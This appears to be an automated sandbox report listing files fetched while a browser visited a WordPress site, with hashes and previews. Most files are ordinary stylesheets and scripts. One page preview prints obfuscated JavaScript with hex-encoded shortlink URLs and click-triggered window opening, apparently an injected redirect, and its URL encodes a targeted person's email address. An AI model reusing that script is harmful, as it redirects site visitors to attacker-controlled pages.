        Reputation:unknown
        URL:https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
        Preview:wOF2.......D......6...............................a......Z?HVAR...`?STAT.8'2..F/~.....|.M....0....6.$.... ..x..<..[.%Q.i.<.N..t.Yx..5.A...|..g#l....5.....D.Bt.......l.Y].)..(..H.s..V..r*uM....[.**....I.0h.v.Hc.R..]....`$.I)G.+.}....E%.H..|..%nEE.....+.x..7|........[..V....[.......0...CA.._....)2.$.....s_fw....+.V.H.B.<?.?..mloc..1.Q....a.r#...)......|.F>..../6-.......t......>......tO.:f@b....u.I(.Bc..b....7.?A.....vE.}...kb]W7.h..$@......T1t.8.._?...~..,..I..."Y...1..s.V........R.Bf2..I....s.........u.P.&..D./"2qf....p.sv..)b5.yR.$MR3.@.E../>{w.....f...cN...2.v.....]>..Ow...9/!v...r..1.4.n.w...T......=...hRH!.....2`...u..82L...S.v.ik^.V.....@..N....d{..{...NN"'.H...H$..H.<..{?..x.....zv.}.~.N)4.g...X.....8|}...e,%.:..;.Q..88...@..=UVHe....g..zD?..U...~.J...oMoP..6B"Y.{BN...vY<.o..r.7.7j%.Z%.'...]...........YK...,.a-;.M....>\.......%'+8Z.1K.y...9.(;.5 ..M..L.(..9...T)........hx..i2Y...m*..{ulY...d......")^.,.n.~..r..S.o.$.....6=.i...N.....q0 ....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):738
        Entropy (8bit):5.0196670578113025
        Encrypted:false
        SSDEEP:
        MD5:1383E4D0EF1C4475D3A93C24C1D5E906
        SHA1:BBAED289A1EE45A8D2DB6DC18FBC4A9B1BAB19B1
        SHA-256:11DA2A2884F4862A564914B4A40DFEB5DF98F6FF289E906B06DB735827B1CFCE
        SHA-512:D358D44B51B4D40B39B3615D22DE25C3BEE16B7EB41B2BC6C7A95B9BD8B35CD7AB9A3BBB11195538B91C92199E88CFB6070E520BE9C8044B7F6DE56D3C1F149A
        Malicious:false
        Reputation:unknown
        Preview:/**..* @preserve Sticky Anything 2.1.1 | (c) WebFactory Ltd | GPL2 Licensed..*/....(function($) {...$(document).ready(function($) {......var thisIsSomeBreakpoint = '' // solely to use as a debugging breakpoint, if needed.......$(sticky_anything_engage.element).stickThis({.....top:sticky_anything_engage.topspace,.....minscreenwidth:sticky_anything_engage.minscreenwidth,.....maxscreenwidth:sticky_anything_engage.maxscreenwidth,.....zindex:sticky_anything_engage.zindex,.....legacymode:sticky_anything_engage.legacymode,.....dynamicmode:sticky_anything_engage.dynamicmode,.....debugmode:sticky_anything_engage.debugmode,.....pushup:sticky_anything_engage.pushup,.....adminbar:sticky_anything_engage.adminbar....});.....});..}(jQuery));..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65536), with no line terminators
        Category:downloaded
        Size (bytes):460543
        Entropy (8bit):5.051253626111919
        Encrypted:false
        SSDEEP:
        MD5:23C5FD91FEF2824E62F9668B917F1626
        SHA1:F59B2725F3C8621B9F5A7BAC0141AA84F6A609CC
        SHA-256:58A1194DD404E504BD2975741E5E7222147E6C50BAEB46FBF833300518DF1413
        SHA-512:C815D4D28B2FE868AB4EEB81DDD2E9FFD31D908FC034A56D7BA377A93CEB321F2601D5104731601621908C341BC0F28B5175E590B1FC7B86AE23990093B2C482
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?ver=3.3.0
        Preview:.ekit-wid-con .row{display:-ms-flexbox;display:-webkit-box;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.ekit-wid-con .col,.ekit-wid-con .col-1,.ekit-wid-con .col-10,.ekit-wid-con .col-11,.ekit-wid-con .col-12,.ekit-wid-con .col-2,.ekit-wid-con .col-3,.ekit-wid-con .col-4,.ekit-wid-con .col-5,.ekit-wid-con .col-6,.ekit-wid-con .col-7,.ekit-wid-con .col-8,.ekit-wid-con .col-9,.ekit-wid-con .col-auto,.ekit-wid-con .col-lg,.ekit-wid-con .col-lg-1,.ekit-wid-con .col-lg-10,.ekit-wid-con .col-lg-11,.ekit-wid-con .col-lg-12,.ekit-wid-con .col-lg-2,.ekit-wid-con .col-lg-3,.ekit-wid-con .col-lg-4,.ekit-wid-con .col-lg-5,.ekit-wid-con .col-lg-6,.ekit-wid-con .col-lg-7,.ekit-wid-con .col-lg-8,.ekit-wid-con .col-lg-9,.ekit-wid-con .col-lg-auto,.ekit-wid-con .col-md,.ekit-wid-con .col-md-1,.ekit-wid-con .col-md-10,.ekit-wid-con .col-md-11,.ekit-wid-con .col-md-12,.ekit-wid-con .col-md-2,.ekit-wid-con .col-md-3,.ekit-wid-con .col-md-4,.ekit-wid-con .col-md-5,.e
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65536), with no line terminators
        Category:downloaded
        Size (bytes):124837
        Entropy (8bit):4.4798601298691025
        Encrypted:false
        SSDEEP:
        MD5:9323FD320E12C4D0D865A254138147D4
        SHA1:93218FBF674488BE2FECCEBF36055C6FC1D8A1EE
        SHA-256:49EBAF0BFAD5AAF0C66DE0BB84A2C7D1E32F33ADD8D6CB75897AE56CB07BCDA9
        SHA-512:CB338E09174455CEA49D9967CC4D7CE230AE0D9D6D9F5484D630C3FA5C315D8F8E1104A8CFC9A1181A5974CFE6C01E2A7A0EC1DADA425C480200841F77F6E241
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=3.3.0
        Preview:@font-face{font-family:elementskit;src:url(../fonts/elementskit.woff?y24e1e) format("woff");font-weight:400;font-style:normal;font-display:swap}.ekit-wid-con .fasicon,.ekit-wid-con .icon,.ekit-wid-con .icon::before,.fasicon,.icon,.icon::before{font-family:elementskit!important;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.ekit-wid-con .fasicon.icon-home::before,.ekit-wid-con .icon.icon-home::before,.icon.icon-home::before{content:"\e800"}.ekit-wid-con .fasicon.icon-advanced-slider::before,.ekit-wid-con .icon.icon-advanced-slider::before,.icon.icon-advanced-slider::before{content:"\e9c8"}.ekit-wid-con .fasicon.icon-image-box::before,.ekit-wid-con .icon.icon-image-box::before,.icon.icon-image-box::before{content:"\ebd1"}.ekit-wid-con .fasicon.icon-image-swap::before,.ekit-wid-con .icon.icon-image-swap::before,.icon.icon-image-swap::before{content:"\eba4"}.ekit-wid-co
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9511), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):101736
        Entropy (8bit):5.7264348307795325
        Encrypted:false
        SSDEEP:
        MD5:E31631DB4AC0C10B73929A25B8916A79
        SHA1:E8CA75D6773C30021A69F03556D8B9E681A00BF0
        SHA-256:BEE6DDFE8873A16AFDE246F0115DFDB2A283388BD33AA44B2AB7B824E0DFE3E5
        SHA-512:6C1D46DC83DEEA17521B0FDCB3B5D6BE39994DDF5C94B3D68E436008496B5CE056ED0E543615DA56D76BB0C3523D8CE01AB563403E6D972BF026188C394AB697
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V1doQlZrOD0mdWlkPVVTRVIxNjEwMjAyNFUzMDEwMTYxNw==N0123NYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20=
        Preview:<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x79\x50\x55\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x62\x74\x59\x35\x63\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x55\x67\x44\x38\x63\x368','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x79\x63\x6f\x2e\x61\x73\x69\x61\x2f\x46\x43\x63\x39\x63\x349','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
        Category:downloaded
        Size (bytes):154014
        Entropy (8bit):4.9320648714471425
        Encrypted:false
        SSDEEP:
        MD5:6C6810E49333A3A126C54EE0E1B24375
        SHA1:184451E67126507D198505503551CE35A137EB8F
        SHA-256:298BE93D2B7660E7F1FA34AEE81A2C8ACAF340279458C75CC370DB2AF7BF8CF2
        SHA-512:6119E977ACEFBEE0A186AA44814759C5AF0CEFB28672C51B2C98D4E62C47D347162ADAF2987E575099C2E67192C73D5E1830C40286FD4634E41B342DA7C86044
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/themes/go/dist/css/style-shared.min.css?ver=1.8.11
        Preview:html{-webkit-text-size-adjust:100%;line-height:1.15}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:initial;height:0;overflow:visible}pre{font-family:monospace;font-size:1em}a{background-color:#0000;text-decoration-thickness:1px}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration-style:dotted;text-decoration-style:dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:initial}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[ty
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.997195757249336
        Encrypted:true
        SSDEEP:
        MD5:B3654D796C572C10388079480034E25D
        SHA1:A89CD3A1F897CF7638FAE8F3CF37F98641C7E0DE
        SHA-256:54E3A89BA39C0939E7DF1401D75DAC12E76B3ACF84F97081DA98249144456C39
        SHA-512:0BDF44AF045CE267F9EE9E0B2D61511E973C77E6322C10B1188BC8E76D74F1A1E5A643FE7051B50D844EAD4022FE47FAC830781F667AB9326FC17B5D3C12CB89
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:4
        Preview:....LuQw]q..Hz.>.HY5.lyP`P*}P.;.....V...R...@c.....[.....@......}5.u.8 ...T.TCe.]S/.....1.b.T.D.^".?.....t...v.>.9;.....f.......k.X.2.'(l.rx....@..I.S........b.a....k...t..#t/.V.tm.<S..J..?y.zl.[.B[......M~.5.....5m."..........{....;.T.@)...>...L.9&%....L.._.58.n..;..d.T)...,.......8.q5.3..gR.,.j.#3.$.g..... ....1...F.,.*;..u]..[.{c.!8$.N.F.H&.w.K.fT5..B....n...S..!....He/BM..K)..Q....TY_.....d.)N..j.....v..._.......A.;....-............C.Z}..A6.......u........T..M..Jk.....^&.o.m|i..wv.v.....DMI}-.WM..@..Y.`...m..Q.q. ]BH.8<8:I.-...u-.cf....8.oW....r..c'...,.h.3....;1......"..{...JZ...{..}...n5.i..........,....o.m.......,S|..n.LN(.S<...2C..5....9....Q.2.*6).. }4+I.Z.7&<...n..y...4....WO.5.........:..H8B..G.m.:......o...e...\....L....te..gj.#.j... &#.....].r:=l9....Z..D....9_.......Gfb.A5.K.q...o...\..iI.....7..b.^.e)w8.t..].6{.=..z.V.I....$.i..`Z..d.K....>I....T.>....O2....N..,n.}..DU.._j.y....T../..I8K.....5..X.M....)..,......\H%Nh]....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
        Category:downloaded
        Size (bytes):252168
        Entropy (8bit):5.609825756290316
        Encrypted:false
        SSDEEP:
        MD5:0726D0306AB913649F9427E81CED8A0F
        SHA1:FE70ED6B4D75F55723C7E9C8910B0C493D083A00
        SHA-256:EF2560F020AA8B4F1E2CB8F945913EE3313FC75CE38C0C56BF940265BB820554
        SHA-512:19128F3A786B56CF8F16B61C6A4940A43D0CA5F64F86288A9F5538E7F01B59C98D5D1699988E31776002EFD7D726D00F8517D60572F0B1DEA2BD00E8B1740B0F
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/dist/style-coblocks-1.css?ver=3.1.13
        Preview::root{--coblocks-spacing--0:0;--coblocks-spacing--1:0.5em;--coblocks-spacing--2:1em;--coblocks-spacing--3:1.5em;--coblocks-spacing--4:2em;--coblocks-spacing--5:2.5em;--coblocks-spacing--6:3em;--coblocks-spacing--7:3.5em;--coblocks-spacing--8:4em;--coblocks-spacing--9:4.5em;--coblocks-spacing--10:7em}[class*=wp-block-coblocks-]{box-sizing:border-box}[class*=wp-block-coblocks-] *,[class*=wp-block-coblocks-] :after,[class*=wp-block-coblocks-] :before{box-sizing:inherit}.bg-repeat{background-repeat:repeat}.bg-no-repeat{background-repeat:no-repeat}.bg-repeat-x{background-repeat:repeat-x}.bg-repeat-y{background-repeat:repeat-y}.bg-cover{background-size:cover}.bg-auto{background-size:auto}.bg-contain{background-size:contain}.bg-top-left{background-position:0 0}.bg-top-center{background-position:top}.bg-top-right{background-position:100% 0}.bg-center-left{background-position:0}.bg-center-center{background-position:50%}.bg-center-right{background-position:100%}.bg-bottom-left{background-positio
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (11256), with no line terminators
        Category:downloaded
        Size (bytes):11256
        Entropy (8bit):5.010537766861896
        Encrypted:false
        SSDEEP:
        MD5:2B0DD7EECEA03B4BDEDB94BA622FDB03
        SHA1:703BECBA85161118DD6FC66AF465428EF43F561C
        SHA-256:B7908A015A567EC2363011DF2475368DBFF34360E9DA3FDFF50604D6395FB646
        SHA-512:FE64CFF950921BDF83EC09FE79CA5CE52DE40F5B8788697EB1D7B28055F2817778347D5D3C81A324801C7EC7151B3EE0EEE99B2882C3C3B10BD760342D3BF3E7
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
        Preview:.mejs-offscreen{border:0;clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal}.mejs-container{background:#000;font-family:Helvetica,Arial,serif;position:relative;text-align:left;text-indent:0;vertical-align:top}.mejs-container,.mejs-container *{box-sizing:border-box}.mejs-container video::-webkit-media-controls,.mejs-container video::-webkit-media-controls-panel,.mejs-container video::-webkit-media-controls-panel-container,.mejs-container video::-webkit-media-controls-start-playback-button{-webkit-appearance:none;display:none!important}.mejs-fill-container,.mejs-fill-container .mejs-container{height:100%;width:100%}.mejs-fill-container{background:transparent;margin:0 auto;overflow:hidden;position:relative}.mejs-container:focus{outline:none}.mejs-iframe-overlay{height:100%;position:absolute;width:100%}.mejs-embed,.mejs-embed body{background:#000;height:100%;margin:0;over
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (3980), with no line terminators
        Category:dropped
        Size (bytes):3980
        Entropy (8bit):5.257681982163298
        Encrypted:false
        SSDEEP:
        MD5:24517B4705671D4C5D14E92EE2854B48
        SHA1:595347EDA8603634191E02C496694C1179B25532
        SHA-256:65B978E80FDF031DA25DA84FD0F3E56D5D3282A2C3C07D1436E8CF1BFCE4C449
        SHA-512:C8B5512D654E62E9A1BA65F0D97A770DB447409CD4AC8A57B4865F09C91D9BC0C7A2003B7390ED58A419EDAC3DC9E496C5EC14606D41B53B5BA87AC290535D1F
        Malicious:false
        Reputation:unknown
        Preview:!function(e){"use strict";jQuery(document).ready(function(e){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)&&1!=option.device_mobile)return!1;if(1!=/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)&&1!=option.device_desktop)return!1;if(e(option.mystickyClass)[0]){var t,i=document.querySelector(option.mystickyClass),o=parseInt(option.disableWidth),s=parseInt(option.disableLargeWidth),n=option.mystickyTransition,d=parseInt(option.activationHeight),a=option.adminBar,r=option.mysticky_disable_down;C();for(var l=i.parentNode,c=document.createElement("div"),m=0,p=0;p<l.childNodes.length;p++)if(l.childNodes[p]==i){m=p;break}c.id="mysticky-wrap",c.appendChild(i),l.insertBefore(c,l.childNodes[m]);var y,f,u=i.parentNode,h=document.createElement("div");if(h.id="mysticky-nav",u.replaceChild(h,i),h.appendChild(i),"0"==d)var w=!0;E(),B();var v,x=0;S(),I();var k=d;P(),H();var g="scrollY"in window,b=0;document.addE
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text
        Category:downloaded
        Size (bytes):14338
        Entropy (8bit):5.564827880606264
        Encrypted:false
        SSDEEP:
        MD5:A2A57805A2B577F8CACEC078EF9B2F35
        SHA1:A225CC7E735EE77230E25EC3D74E7D3A330DDC48
        SHA-256:22B57CE77D638637DFA024822B6CF962101DE3BA9879C312A51D604A67A315A9
        SHA-512:110BD4276374C9C8EA22AA9D6EEE956AE3794E6265B422A189EBB4400BF91C8B9742DFBF9404D575D19A4BACA61AAFAC055BB6CA834C9C552732819D651BAC04
        Malicious:false
        Reputation:unknown
        URL:https://fonts.googleapis.com/css?family=Crimson+Text%3A400%2C400i%2C700%2C700i%7CNunito+Sans%3A400%2C400i%2C600%2C700&subset=latin%2Clatin-ext&display=swap&ver=1.8.11
        Preview:/* vietnamese */.@font-face {. font-family: 'Crimson Text';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/crimsontext/v19/wlpogwHKFkZgtmSR3NB0oRJfajheK_Zt3Q.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Crimson Text';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/crimsontext/v19/wlpogwHKFkZgtmSR3NB0oRJfajhfK_Zt3Q.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Crimson Text';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(http
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):267
        Entropy (8bit):4.743434724061889
        Encrypted:false
        SSDEEP:
        MD5:325D7E95181FD16FC6AD025324866D80
        SHA1:7462F9DF8868D6F8CA4F3153AB35272C0505EBCD
        SHA-256:C33DAD0527C0BA65C3363C9F324E8330E17A10CE2BFD3B71F0DAF0A5C89F6201
        SHA-512:D7331E92C1CECCBFBA17ADD54DE24F244F9BCC854E442168215FAEE42BBB5C9644EAA04DD533DF23715E70ABBDC26DF58D95926B4259E558D8B4FD6A3125D4C7
        Malicious:false
        Reputation:unknown
        Preview:jQuery(document).ready(function(){jQuery('.mip-drop-nav').change(function(){let url=jQuery(this).val(),destination=jQuery(this).find(':selected').data('target');if(typeof destination!=='undefined'){window.open(url,destination);}else{document.location.href=url;}});});
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1248), with no line terminators
        Category:dropped
        Size (bytes):1248
        Entropy (8bit):4.942085022543353
        Encrypted:false
        SSDEEP:
        MD5:6C9239B1028E8D0640F2952CEF801242
        SHA1:57D7049D9DA23B01E7A74738DDC8A28D3C84449F
        SHA-256:6753B4B0CBC3C99E713BDC896DE395BF1EB5246E2FF96555151FA515BDA7CD78
        SHA-512:ECDC7F12ED675A7F7F8D5272CBC638CAE08E55C05B9C1739C771D8FA2478D485355C2B2C357DEC8AF1A7B4A05471876D9FCB20ED8BFB305E3B96595C022733CE
        Malicious:false
        Reputation:unknown
        Preview:!function(e){"use strict";const s="morphext",i={animation:"bounce",speed:2e3,autoInit:!0,phrases:[],animateCssVersion:"4.1.1",autoAttachAnimateCss:!0};function n(t){this.element=e(t),this._settings=e.extend({},i,JSON.parse(this.element.attr("data-morphext-options"))),this._defaults=i,this._init()}n.prototype={_init:function(){var t;this.element.addClass("morphext"),this._settings.autoAttachAnimateCss&&(t=`https://cdnjs.cloudflare.com/ajax/libs/animate.css/${this._settings.animateCssVersion}/animate.min.css`,e(`link[href='${t}']`).length||e(`<link href="${t}" rel="stylesheet">`).appendTo("head")),this._index=0,this.animate(),this.start()},animate:function(){this._index=this._index%this._settings.phrases.length;const t=document.createElement("span");t.classList.add("morphext__animated","animate__animated",`animate__${this._settings.animation}`),e(t).text(this._settings.phrases[this._index]),this.element.html(e(t).prop("outerHTML")),this._index+=1},start:function(){var t=this;this._interv
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (5751)
        Category:downloaded
        Size (bytes):19471
        Entropy (8bit):5.722342167931891
        Encrypted:false
        SSDEEP:
        MD5:68AE67AB846410DCB9FCAFB5E7474424
        SHA1:BB9E0FFADE14E8C99EF3071AEDB57E268779346A
        SHA-256:228B92D151F4F81E745855931F27232A1EF9C06FF19C8F0E7ED6C63E6727DA51
        SHA-512:AFE9DBC57C24AF4D87A2BC1E255672F962BF736104768DA47461B8872399F7C290F59AD767D9AC88C21BB55DDF86F7ABC06D6B5813ED9FAAF48F66872D459233
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/dist/style-coblocks-extensions.css?ver=3.1.13
        Preview:.wp-block-paragraph.is-style-error,.wp-block-paragraph.is-style-info,.wp-block-paragraph.is-style-success,.wp-block-paragraph.is-style-warning,p.is-style-error,p.is-style-info,p.is-style-success,p.is-style-warning{border-radius:4px;box-sizing:border-box;padding:32px}.wp-block-paragraph.is-style-error.coblocks-alert-paragraph,.wp-block-paragraph.is-style-info.coblocks-alert-paragraph,.wp-block-paragraph.is-style-success.coblocks-alert-paragraph,.wp-block-paragraph.is-style-warning.coblocks-alert-paragraph,p.is-style-error.coblocks-alert-paragraph,p.is-style-info.coblocks-alert-paragraph,p.is-style-success.coblocks-alert-paragraph,p.is-style-warning.coblocks-alert-paragraph{margin-bottom:var(--go--spacing--vertical);margin-top:var(--go--spacing--vertical)}.wp-block-paragraph:not(.has-background).is-style-info,p:not(.has-background).is-style-info{background-color:#d6efee}.wp-block-paragraph:not(.has-background).is-style-warning,p:not(.has-background).is-style-warning{background-color:#fbe
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text
        Category:downloaded
        Size (bytes):15528
        Entropy (8bit):5.0368392128907935
        Encrypted:false
        SSDEEP:
        MD5:025940AAAAF639650061299F18F2DF41
        SHA1:45CDC949BB0F0412919AB4D7EACC6F175A5408BE
        SHA-256:2BBDD86317CD04D4AC364E6655288CA840992D0F6FF68D78C841C04E1C63F646
        SHA-512:5BE1AF65FD7416B308DFADAD0D81354405FED16A7410DFD046CF153CFDF6A381C9F48168193A27285FA0895942D59CDD096E7575B63B370DDBA7055B44EAC3CD
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/modal-window/public/assets/css/modal.css?ver=6.1.1
        Preview:@charset "UTF-8";.html.no-scroll {. scrollbar-gutter: stable;.}..body.no-scroll {. overflow-y: hidden;.}...modal-window {. --mw-zindex: 999999;. --mw-position: fixed;. --mw-inset-top: auto;. --mw-inset-right: auto;. --mw-inset-bottom: auto;. --mw-inset-left: auto;. --mw-inset: var(--mw-inset-top) var(--mw-inset-right) var(--mw-inset-bottom) var(--mw-inset-left);. --mw-width: 662px;. --mw-height: auto;. --mw-bg-color: #ffffff;. --mw-bg-img: none;. --mw-padding: 10px;. --mw-font-size: 16px;. --mw-font-family: inherit;. --mw-shadow: none;. --mw-radius: 5px;. --mw-border: none;. --mw-overlay: rgba(0, 0, 0, .7);. --mw-scrollbar-width: thin;. --mw-scrollbar-thin: 6px;. --mw-scrollbar-color: #4F4F4F;. --mw-scrollbar-track: rgba(255, 255, 255, 0);. --mw-close-inset: 0 0 auto auto;. --mw-close-padding: 6px 12px;. --mw-close-size: 12px;. --mw-close-font: inherit;. --mw-close-weight: 400;. --mw-close-style: normal;. --mw-close-radius: 0;. --mw-close-color: #ffffff;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1191), with no line terminators
        Category:dropped
        Size (bytes):1191
        Entropy (8bit):5.027775143359677
        Encrypted:false
        SSDEEP:
        MD5:51300497928562F8C86C7AABA99237CD
        SHA1:E5826832B85C6AFC6502B74CBB8AC5394B04C363
        SHA-256:6D161E98E47AE150B51211443EEF37040FB6269DCF85AD2048548066DCA99E6F
        SHA-512:04BFDF1A41712238902BC6A0E07EFAF356217E98560C52FA5D175C29191617C35853382CE2F69966BDD5E1B40114B872D962A5FAD26A9E0B7D4FC016A6DCB833
        Malicious:false
        Reputation:unknown
        Preview:!function(a){void 0===mejs.plugins&&(mejs.plugins={},mejs.plugins.silverlight=[],mejs.plugins.silverlight.push({types:[]})),mejs.HtmlMediaElementShim=mejs.HtmlMediaElementShim||{getTypeFromFile:mejs.Utils.getTypeFromFile},void 0===mejs.MediaFeatures&&(mejs.MediaFeatures=mejs.Features),void 0===mejs.Utility&&(mejs.Utility=mejs.Utils);var e=MediaElementPlayer.prototype.init,t=(MediaElementPlayer.prototype.init=function(){this.options.classPrefix="mejs-",this.$media=this.$node=a(this.node),e.call(this)},MediaElementPlayer.prototype._meReady);MediaElementPlayer.prototype._meReady=function(){this.container=a(this.container),this.controls=a(this.controls),this.layers=a(this.layers),t.apply(this,arguments)},MediaElementPlayer.prototype.getElement=function(e){return void 0!==a&&e instanceof a?e[0]:e},MediaElementPlayer.prototype.buildfeatures=function(e,t,i,s){for(var l=["playpause","current","progress","duration","tracks","volume","fullscreen"],r=0,n=this.options.features.length;r<n;r++){var
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (14366), with no line terminators
        Category:downloaded
        Size (bytes):14366
        Entropy (8bit):5.221798782931504
        Encrypted:false
        SSDEEP:
        MD5:252A7A5BBB2E3DD12F13C550625CC8BA
        SHA1:6EA01C6C412EEC51D81CB1101ACECCCEDC565A32
        SHA-256:B6043EE4A9960E025742C70262F22B6585271DF6DE2C4CC1148962FD5EDC8C0B
        SHA-512:2587956A00BF9240B700E918D4D588D6A049DB422DE34F7DF2A6C1E1BFD5C1E55017C4EBA60E3459090A8F5870522BD824855F6A1BEBED12F8818A94D80A4C58
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/dist/js/coblocks-tinyswiper-initializer.js?ver=3.1.13
        Preview:(()=>{var e={7152:function(e){e.exports=function(){"use strict";function e(){return(e=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n,i=arguments[t];for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e}).apply(this,arguments)}function t(e,t){void 0===t&&(t=[]),Array.isArray(t)||(t=[t]),t.forEach((function(t){return!e.classList.contains(t)&&e.classList.add(t)}))}function n(e,t,n,i){e.addEventListener(t,n,i)}function i(e,t,n){e.removeEventListener(t,n)}function o(e,t,n){return void 0===n&&(n=""),e.setAttribute(t,n),e}function r(e,t,n){return Object.keys(t).forEach((function(n){e.style[n]=t[n]})),n&&getComputedStyle(e),e}var a={direction:"horizontal",touchRatio:1,touchAngle:45,longSwipesRatio:.5,initialSlide:0,loop:!1,freeMode:!1,passiveListeners:!0,resistance:!0,resistanceRatio:.85,speed:300,longSwipesMs:300,spaceBetween:0,slidesPerView:1,centeredSlides:!1,slidePrevClass:"swiper-slide-prev",slideNextClass:"swiper-slide-next",slideActiveClass:"sw
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (57765)
        Category:downloaded
        Size (bytes):112427
        Entropy (8bit):4.925295015861728
        Encrypted:false
        SSDEEP:
        MD5:319580D7D8944A1A65F635E0D11E5DA5
        SHA1:E23BC18EF1B0F78F7010E3C16E4C5E1F333248BD
        SHA-256:FB3A89CC6347E098063BD15F285BC90411846DDCE6F17812364FEEDAB67A67F5
